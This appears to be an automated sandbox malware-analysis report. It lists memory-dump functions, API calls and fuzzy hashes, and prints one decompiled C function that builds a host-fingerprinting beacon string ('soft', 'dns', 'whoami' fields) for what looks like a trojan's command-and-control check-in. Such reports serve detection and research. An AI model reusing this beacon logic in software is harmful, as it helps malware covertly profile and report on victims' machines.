                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FC4
                                                                                                                          • int.LIBCPMT ref: 6E306FD1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FE1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                          • String ID: 8=An$<=An$@=An$D=An$D=An$H=An$H=An$L=An$L=An$P=An$T=An$T=An
                                                                                                                          • API String ID: 2009638416-1366981069
                                                                                                                          • Opcode ID: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction ID: 22c100071f38c969e5c3fd6360353a9a77e72891a3ceea694c84d21490914707
                                                                                                                          • Opcode Fuzzy Hash: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction Fuzzy Hash: C791F6B1D04319AFEB215FF5CC54BBFBAADAF52754F00481DE844AB280EB758941C7A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD6109, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04CD6109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x4cdd018; // 0x14d7c998
				asm("bswap eax");
				_t61 =  *0x4cdd014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x4cdd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x4cdd00c; // 0x81762942
				asm("bswap eax");
				_t64 =  *0x4cdd2e0; // 0xbda5a8
				_t3 = _t64 + 0x4cde633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x4cdd02c,  *0x4cdd004, _t59);
				_t67 = E04CD5B60();
				_t68 =  *0x4cdd2e0; // 0xbda5a8
				_t4 = _t68 + 0x4cde673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E04CD1BBF(_t134);
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x4cdd2e0; // 0xbda5a8
					_t7 = _t126 + 0x4cde8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x4cdd270, 0, _v8);
				}
				_t73 = E04CD137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x4cdd2e0; // 0xbda5a8
					_t11 = _t121 + 0x4cde8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x4cdd270, 0, _v8);
				}
				_t146 =  *0x4cdd364; // 0x58b95b0
				_t75 = E04CD3857(0x4cdd00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x4cdd270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x4cdd270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x4cdd270, _t152, _v20);
						goto L26;
					}
					E04CDA811(GetTickCount());
					_t82 =  *0x4cdd364; // 0x58b95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x4cdd364; // 0x58b95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x4cdd364; // 0x58b95b0
					_t148 = E04CD1974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x4cdd270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x4cdc2ac);
					_push(_t148);
					_t94 = E04CD38CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x4cdd270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04CD1922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04CD47D5();
						L22:
						HeapFree( *0x4cdd270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E04CD365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E04CD3273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E04CD4AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04CD8FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04CD4AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                          0x04cd6109
                                                                                                                          0x04cd6109
                                                                                                                          0x04cd6109
                                                                                                                          0x04cd6112
                                                                                                                          0x04cd611b
                                                                                                                          0x04cd611d
                                                                                                                          0x04cd611d
                                                                                                                          0x04cd612a
                                                                                                                          0x04cd6135
                                                                                                                          0x04cd6138
                                                                                                                          0x04cd613d
                                                                                                                          0x04cd6146
                                                                                                                          0x04cd6149
                                                                                                                          0x04cd614e
                                                                                                                          0x04cd6151
                                                                                                                          0x04cd6156
                                                                                                                          0x04cd6159
                                                                                                                          0x04cd6165
                                                                                                                          0x04cd6172
                                                                                                                          0x04cd6174
                                                                                                                          0x04cd617a
                                                                                                                          0x04cd617f
                                                                                                                          0x04cd618a
                                                                                                                          0x04cd618c
                                                                                                                          0x04cd618f
                                                                                                                          0x04cd6191
                                                                                                                          0x04cd6196
                                                                                                                          0x04cd619c
                                                                                                                          0x04cd61a1
                                                                                                                          0x04cd61a4
                                                                                                                          0x04cd61a9
                                                                                                                          0x04cd61b6
                                                                                                                          0x04cd61b8
                                                                                                                          0x04cd61be
                                                                                                                          0x04cd61c8
                                                                                                                          0x04cd61c8
                                                                                                                          0x04cd61ca
                                                                                                                          0x04cd61cf
                                                                                                                          0x04cd61d4
                                                                                                                          0x04cd61d7
                                                                                                                          0x04cd61dc
                                                                                                                          0x04cd61e9
                                                                                                                          0x04cd61eb
                                                                                                                          0x04cd61f9
                                                                                                                          0x04cd61f9
                                                                                                                          0x04cd61fb
                                                                                                                          0x04cd6209
                                                                                                                          0x04cd620e
                                                                                                                          0x04cd6210
                                                                                                                          0x04cd6215
                                                                                                                          0x04cd63d6
                                                                                                                          0x04cd63e0
                                                                                                                          0x04cd63e9
                                                                                                                          0x04cd621b
                                                                                                                          0x04cd6227
                                                                                                                          0x04cd622d
                                                                                                                          0x04cd6232
                                                                                                                          0x04cd63ca
                                                                                                                          0x04cd63d4
                                                                                                                          0x00000000
                                                                                                                          0x04cd63d4
                                                                                                                          0x04cd623e
                                                                                                                          0x04cd6243
                                                                                                                          0x04cd624c
                                                                                                                          0x04cd625d
                                                                                                                          0x04cd6261
                                                                                                                          0x04cd626a
                                                                                                                          0x04cd6270
                                                                                                                          0x04cd627f
                                                                                                                          0x04cd6286
                                                                                                                          0x04cd628f
                                                                                                                          0x04cd6295
                                                                                                                          0x04cd63be
                                                                                                                          0x04cd63c8
                                                                                                                          0x00000000
                                                                                                                          0x04cd63c8
                                                                                                                          0x04cd62a1
                                                                                                                          0x04cd62a7
                                                                                                                          0x04cd62a8
                                                                                                                          0x04cd62ad
                                                                                                                          0x04cd62b2
                                                                                                                          0x04cd63b4
                                                                                                                          0x04cd63bc
                                                                                                                          0x00000000
                                                                                                                          0x04cd63bc
                                                                                                                          0x04cd62bb
                                                                                                                          0x04cd62c2
                                                                                                                          0x04cd62ca
                                                                                                                          0x04cd62cf
                                                                                                                          0x04cd62d8
                                                                                                                          0x04cd62e3
                                                                                                                          0x04cd62e8
                                                                                                                          0x04cd62ed
                                                                                                                          0x04cd63ec
                                                                                                                          0x04cd63a0
                                                                                                                          0x04cd63a0
                                                                                                                          0x04cd63a5
                                                                                                                          0x04cd63b0
                                                                                                                          0x04cd63b2
                                                                                                                          0x00000000
                                                                                                                          0x04cd63b2
                                                                                                                          0x04cd62f7
                                                                                                                          0x04cd62fc
                                                                                                                          0x04cd6301
                                                                                                                          0x04cd6306
                                                                                                                          0x04cd6316
                                                                                                                          0x04cd6319
                                                                                                                          0x04cd631f
                                                                                                                          0x04cd6325
                                                                                                                          0x04cd632b
                                                                                                                          0x04cd632e
                                                                                                                          0x04cd6334
                                                                                                                          0x04cd6337
                                                                                                                          0x04cd633c
                                                                                                                          0x04cd6340
                                                                                                                          0x04cd6340
                                                                                                                          0x04cd634c
                                                                                                                          0x04cd6358
                                                                                                                          0x04cd635c
                                                                                                                          0x04cd635e
                                                                                                                          0x04cd6363
                                                                                                                          0x04cd6365
                                                                                                                          0x04cd636a
                                                                                                                          0x04cd636f
                                                                                                                          0x04cd637c
                                                                                                                          0x04cd6384
                                                                                                                          0x04cd6387
                                                                                                                          0x04cd6387
                                                                                                                          0x04cd6363
                                                                                                                          0x00000000
                                                                                                                          0x04cd634e
                                                                                                                          0x04cd6352
                                                                                                                          0x04cd6389
                                                                                                                          0x04cd638c
                                                                                                                          0x04cd6395
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd6395
                                                                                                                          0x04cd6354
                                                                                                                          0x00000000
                                                                                                                          0x04cd6354
                                                                                                                          0x04cd634c

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD611D
                                                                                                                          • wsprintfA.USER32 ref: 04CD616D
                                                                                                                          • wsprintfA.USER32 ref: 04CD618A
                                                                                                                          • wsprintfA.USER32 ref: 04CD61B6
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD61C8
                                                                                                                          • wsprintfA.USER32 ref: 04CD61E9
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD61F9
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04CD6227
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD6238
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD624C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD626A
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?,058B95B0), ref: 04CD199F
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(?,?,?,04CD4653,?,058B95B0), ref: 04CD19A7
                                                                                                                            • Part of subcall function 04CD1974: strcpy.NTDLL ref: 04CD19BE
                                                                                                                            • Part of subcall function 04CD1974: lstrcat.KERNEL32(00000000,?), ref: 04CD19C9
                                                                                                                            • Part of subcall function 04CD1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD19E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,04CDC2AC,?,058B95B0), ref: 04CD62A1
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(058B9B10,00000000,00000000,745EC740,04CD467E,00000000), ref: 04CD38DA
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(?), ref: 04CD38E2
                                                                                                                            • Part of subcall function 04CD38CA: lstrcpy.KERNEL32(00000000,058B9B10), ref: 04CD38F6
                                                                                                                            • Part of subcall function 04CD38CA: lstrcat.KERNEL32(00000000,?), ref: 04CD3901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04CD62C2
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 04CD62CA
                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 04CD62D8
                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 04CD62DE
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                          • wcstombs.NTDLL ref: 04CD636F
                                                                                                                            • Part of subcall function 04CD3273: SysAllocString.OLEAUT32(?), ref: 04CD32AE
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04CD63B0
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04CD63BC
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,058B95B0), ref: 04CD63C8
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD63D4
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD63E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748877296-0
                                                                                                                          • Opcode ID: 8a767b6b2ad4ce3e29a34f8fcb5e5bd74bca93fb8801a5a432e48474f58fd5d7
                                                                                                                          • Instruction ID: c7db18a1215b91f58e1e116cbae5a1fb566bb2121b54a8ce346287cb8e47b921
                                                                                                                          • Opcode Fuzzy Hash: 8a767b6b2ad4ce3e29a34f8fcb5e5bd74bca93fb8801a5a432e48474f58fd5d7
                                                                                                                          • Instruction Fuzzy Hash: 89913875901209AFDB11AFA8DC88BAE7BBAFF48314F144025FA06D7250DB35ED11DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6E33B2E8
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA15
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA27
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA39
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA4B
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA5D
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA6F
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA81
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA93
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAA5
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAB7
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAC9
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CADB
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAED
                                                                                                                          • _free.LIBCMT ref: 6E33B2DD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33B2FF
                                                                                                                          • _free.LIBCMT ref: 6E33B314
                                                                                                                          • _free.LIBCMT ref: 6E33B31F
                                                                                                                          • _free.LIBCMT ref: 6E33B341
                                                                                                                          • _free.LIBCMT ref: 6E33B354
                                                                                                                          • _free.LIBCMT ref: 6E33B362
                                                                                                                          • _free.LIBCMT ref: 6E33B36D
                                                                                                                          • _free.LIBCMT ref: 6E33B3A5
                                                                                                                          • _free.LIBCMT ref: 6E33B3AC
                                                                                                                          • _free.LIBCMT ref: 6E33B3C9
                                                                                                                          • _free.LIBCMT ref: 6E33B3E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 9f595cf4663ba49c3c27c2617a72f93137eff1310d12a0bfc860585168004362
                                                                                                                          • Instruction ID: 643d77b938cb2e80e64f6ad0a7dcce358491d49f49f3c06f0594ae71bd86d903
                                                                                                                          • Opcode Fuzzy Hash: 9f595cf4663ba49c3c27c2617a72f93137eff1310d12a0bfc860585168004362
                                                                                                                          • Instruction Fuzzy Hash: D8314E31604AA19FEB519BB9E840FDAB3F8AF00364FB44819E094DA159DF31ED54CB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305681, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305688
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305692
                                                                                                                          • int.LIBCPMT ref: 6E3056A9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3056E3
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305703
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305710
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30571D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: T=An
                                                                                                                          • API String ID: 3920336645-183501617
                                                                                                                          • Opcode ID: af97d9ee79a885e37b4d51e80876e17d01ba37c3b4bf55f91fbbdbc7e59dc5a9
                                                                                                                          • Instruction ID: b88e0c7fdfb887db62a379d231eeeb2d20fc69b82dc71074db70c368b6d25c31
                                                                                                                          • Opcode Fuzzy Hash: af97d9ee79a885e37b4d51e80876e17d01ba37c3b4bf55f91fbbdbc7e59dc5a9
                                                                                                                          • Instruction Fuzzy Hash: E721F37590061DDBCF02DFE4D9047EEBBBABF45718F504909E8506B280CB709941DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7D9F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7DA6
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7DB0
                                                                                                                          • int.LIBCPMT ref: 6E2F7DC7
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7E01
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7E21
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7E2E
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7E3B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: x<An
                                                                                                                          • API String ID: 3920336645-3788929408
                                                                                                                          • Opcode ID: f6a17c18c7609e60e5b72a0950a2e08927fa5b03e2f03755c507ef8d172143e7
                                                                                                                          • Instruction ID: e4c38b555e5148da7ca9bee51b1657c5267a73514a24089315a02dc41184577e
                                                                                                                          • Opcode Fuzzy Hash: f6a17c18c7609e60e5b72a0950a2e08927fa5b03e2f03755c507ef8d172143e7
                                                                                                                          • Instruction Fuzzy Hash: 2421D47994011EDBCF01DFE4D911AEEBBBAAF45714F10490AE8506B280DB709D02CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E3054C2, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3054C9
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3054D3
                                                                                                                          • int.LIBCPMT ref: 6E3054EA
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E30550D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305524
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305544
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305551
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: L=An
                                                                                                                          • API String ID: 3376033448-2673704001
                                                                                                                          • Opcode ID: 18e0cfcd1be408711dd7825c5c79e21c7cb9c301a716e3af838d2f8a63873de7
                                                                                                                          • Instruction ID: c934ce03d4ed54ef24108c2da636eeeb9f0121477426b7f36b26a66e0f761f1f
                                                                                                                          • Opcode Fuzzy Hash: 18e0cfcd1be408711dd7825c5c79e21c7cb9c301a716e3af838d2f8a63873de7
                                                                                                                          • Instruction Fuzzy Hash: AB01C07A900519EBCF11DBE8C954AFEB7BBAF45318F150809D8226B280DF70DA46CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305557, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30555E
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305568
                                                                                                                          • int.LIBCPMT ref: 6E30557F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E3055A2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3055B9
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3055D9
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3055E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: H=An
                                                                                                                          • API String ID: 3376033448-272624406
                                                                                                                          • Opcode ID: 49b858208bebf9cc40ec03e10010d73b544bee83bdea5513b6de6effd32370d6
                                                                                                                          • Instruction ID: 45908b957ccecad6234f632ae943c643a27ae4a2436b8a6ad285787d1aadb37f
                                                                                                                          • Opcode Fuzzy Hash: 49b858208bebf9cc40ec03e10010d73b544bee83bdea5513b6de6effd32370d6
                                                                                                                          • Instruction Fuzzy Hash: 740100B680051DEBCF21DBE4D955AFEB77BAF81328F200809D4116B280DF749A42C790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E30526E, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305275
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30527F
                                                                                                                          • int.LIBCPMT ref: 6E305296
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E3052B9
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3052D0
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3052F0
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3052FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID: 8=An
                                                                                                                          • API String ID: 1767075461-2063616906
                                                                                                                          • Opcode ID: 19a1433f208d3bae1d9f62351a1e6e298944f2743b3e1caa6c6c23bc0e538bad
                                                                                                                          • Instruction ID: 81edfd91a2972bab58d5d88a860d09d40b4e034a937b5797d5773c46d7581bff
                                                                                                                          • Opcode Fuzzy Hash: 19a1433f208d3bae1d9f62351a1e6e298944f2743b3e1caa6c6c23bc0e538bad
                                                                                                                          • Instruction Fuzzy Hash: 9F01007A94051DEBCF01DBE4C855AEEB77AAF85328F200809D410AB290DF709D468790
